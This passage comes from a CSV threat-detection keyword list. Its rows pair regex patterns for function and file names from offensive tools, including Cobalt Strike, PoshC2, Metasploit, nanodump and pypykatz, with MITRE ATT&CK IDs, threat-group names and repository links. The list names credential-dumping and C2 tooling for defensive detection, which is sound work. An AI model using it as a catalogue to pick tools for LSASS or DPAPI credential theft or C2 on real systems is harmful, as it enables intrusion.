TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*get_BeaconHealthCheck_settings*",".{0,1000}get_BeaconHealthCheck_settings.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*get_c2_messages*",".{0,1000}get_c2_messages.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_c2server_all*",".{0,1000}get_c2server_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_cmd_from_task_id*",".{0,1000}get_cmd_from_task_id.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_dns_dnsidle*",".{0,1000}get_dns_dnsidle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_dns_sleep*",".{0,1000}get_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Get_DPAPI_Protected_Files*",".{0,1000}Get_DPAPI_Protected_Files.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*get_filezilla_creds.rb*",".{0,1000}get_filezilla_creds\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*get_hijackeable_dllname*",".{0,1000}get_hijackeable_dllname.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*get_implants_all*",".{0,1000}get_implants_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_injection_techniques*",".{0,1000}get_injection_techniques.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*get_keystrokes.py*",".{0,1000}get_keystrokes\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*get_list_of_implant_text*",".{0,1000}get_list_of_implant_text.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_masterkeys_from_lsass*",".{0,1000}get_masterkeys_from_lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*get_newimplanturl*",".{0,1000}get_newimplanturl.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_obfucation_string_dict*",".{0,1000}get_obfucation_string_dict.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_password_policy.x64.*",".{0,1000}get_password_policy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*get_password_policy.x86.*",".{0,1000}get_password_policy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*get_post_ex_pipename_list*",".{0,1000}get_post_ex_pipename_list.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_post_ex_spawnto_x*",".{0,1000}get_post_ex_spawnto_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_allocator*",".{0,1000}get_process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_bof_allocator*",".{0,1000}get_process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_execute*",".{0,1000}get_process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_rooot.c*",".{0,1000}get_rooot\.c.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*get_sharpurls*",".{0,1000}get_sharpurls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_stage_allocator*",".{0,1000}get_stage_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_mz_64*",".{0,1000}get_stage_magic_mz_64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_mz_86*",".{0,1000}get_stage_magic_mz_86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_pe*",".{0,1000}get_stage_magic_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_virtual_Hook_address*",".{0,1000}get_virtual_Hook_address.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 